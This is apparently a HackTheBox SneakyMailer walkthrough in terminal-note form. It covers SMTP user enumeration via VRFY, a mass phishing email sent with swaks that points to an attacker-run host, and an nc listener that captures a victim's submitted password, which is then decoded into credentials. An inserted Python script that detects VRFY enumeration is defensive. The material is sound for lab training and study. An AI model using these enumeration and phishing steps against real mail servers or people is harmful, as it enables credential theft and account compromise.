4 :25 smtp
$ nc -vn 10.10.10.197 25
(UNKNOWN) [10.10.10.197] 25 (smtp) open
220 debian ESMTP Postfix (Debian/GNU)
HELO x
250 debian
VRFY root
252 2.0.0 root
VRFY kashz
550 5.1.1 <kashz>: Recipient address rejected: User unknown in local recipient table
# trying to enumerate users / emails with VRFY
# for emails: code 252: cannot verify the user, but it will try to deliver the message anyway
# for users: code 550: requested action not taken: mailbox unavailable (e.g., mailbox not found, no access, or command rejected for policy reasons)
# root returns 252 and kashz returns 550, so VRFY tells existing local users apart from unknown ones
# going by the name of the box, let's just send a phishing email
# using Sublime, converted whitespace (\s) to commas
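A check for the VRFY behaviour above, as an added example that is not part of the original notes: it parses SMTP reply lines and reports whether the server answers differently for known and unknown names. The `HARDENED` replies are a constructed assumption of what Postfix returns with `disable_vrfy_command = yes`; the function names are hypothetical.

```python
import re
from collections import defaultdict

# Constructed input: the two VRFY replies from the session above, as (probe, reply).
OBSERVED = [
    ("root", "252 2.0.0 root"),
    ("kashz", "550 5.1.1 <kashz>: Recipient address rejected: "
              "User unknown in local recipient table"),
]
# Constructed input (assumption): replies from a Postfix server configured with
# disable_vrfy_command = yes, which refuses VRFY the same way for every name.
HARDENED = [
    ("root", "502 5.5.1 VRFY command is disabled"),
    ("kashz", "502 5.5.1 VRFY command is disabled"),
]

# Reply code, optional RFC 3463 enhanced status code, free text.
REPLY_RE = re.compile(r"^(\d{3})(?:[ -]([245]\.\d{1,3}\.\d{1,3}))?[ -]?(.*)$")


def parse_reply(line):
    """Split one SMTP reply line into (code, enhanced_status, text)."""
    m = REPLY_RE.match(line.strip())
    if m is None:
        raise ValueError(f"not an SMTP reply: {line!r}")
    return int(m.group(1)), m.group(2), m.group(3)


def reply_classes(results):
    """Group probed names by the (code, enhanced_status) the server returned."""
    classes = defaultdict(list)
    for probe, line in results:
        code, status, _ = parse_reply(line)
        classes[(code, status)].append(probe)
    return dict(classes)


def leaks_user_existence(results):
    """True when different names get different reply classes (an enumeration oracle)."""
    return len(reply_classes(results)) > 1


if __name__ == "__main__":
    for label, data in (("observed", OBSERVED), ("hardened", HARDENED)):
        print(label, reply_classes(data), "leaks:", leaks_user_existence(data))
```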
$ emails="airisatou@sneakymailer.htb,angelicaramos@sneakymailer.htb,ashtoncox@sneakymailer.htb,bradleygreer@sneakymailer.htb,brendenwagner@sneakymailer.htb,briellewilliamson@sneakymailer.htb,brunonash@sneakymailer.htb,caesarvance@sneakymailer.htb,carastevens@sneakymailer.htb,cedrickelly@sneakymailer.htb,chardemarshall@sneakymailer.htb,colleenhurst@sneakymailer.htb,dairios@sneakymailer.htb,donnasnider@sneakymailer.htb,doriswilder@sneakymailer.htb,finncamacho@sneakymailer.htb,fionagreen@sneakymailer.htb,garrettwinters@sneakymailer.htb,gavincortez@sneakymailer.htb,gavinjoyce@sneakymailer.htb,glorialittle@sneakymailer.htb,haleykennedy@sneakymailer.htb,hermionebutler@sneakymailer.htb,herrodchandler@sneakymailer.htb,hopefuentes@sneakymailer.htb,howardhatfield@sneakymailer.htb,jacksonbradshaw@sneakymailer.htb,jenagaines@sneakymailer.htb,jenettecaldwell@sneakymailer.htb,jenniferacosta@sneakymailer.htb,jenniferchang@sneakymailer.htb,jonasalexander@sneakymailer.htb,laelgreer@sneakymailer.htb,martenamccray@sneakymailer.htb,michaelsilva@sneakymailer.htb,michellehouse@sneakymailer.htb,olivialiang@sneakymailer.htb,paulbyrd@sneakymailer.htb,prescottbartlett@sneakymailer.htb,quinnflynn@sneakymailer.htb,rhonadavidson@sneakymailer.htb,sakurayamamoto@sneakymailer.htb,sergebaldwin@sneakymailer.htb,shaddecker@sneakymailer.htb,shouitou@sneakymailer.htb,sonyafrost@sneakymailer.htb,sukiburks@sneakymailer.htb,sulcud@sneakymailer.htb,tatyanafitzpatrick@sneakymailer.htb,thorwalton@sneakymailer.htb,tigernixon@sneakymailer.htb,timothymooney@sneakymailer.htb,unitybutler@sneakymailer.htb,vivianharrell@sneakymailer.htb,yuriberry@sneakymailer.htb,zenaidafrank@sneakymailer.htb,zoritaserrano@sneakymailer.htb"
# using swaks to send email to all
$ swaks --to $emails --from kashz@sneakmailer.htb --header "kashz" --body "http://10.10.16.7/" --server 10.10.10.197
[truncated]
$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.197 - - [29/Sep/2021 19:08:10] code 501, message Unsupported method ('POST')
10.10.10.197 - - [29/Sep/2021 19:08:10] "POST / HTTP/1.1" 501 -
# redoing it with a listener to capture the POST request
$ nc -lvnp 80
listening on [any] 80 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.197] 44414
POST / HTTP/1.1
Host: 10.10.16.7
User-Agent: python-requests/2.23.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 185
Content-Type: application/x-www-form-urlencoded
firstName=Paul&lastName=Byrd&email=paulbyrd%40sneakymailer.htb&password=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt&rpassword=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt
# url-decode
firstName=Paul&lastName=Byrd&email=paulbyrd@sneakymailer.htb&
password=^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht&
rpassword=^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht
# creds:
paulbyrd@sneakymailer.htb:^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht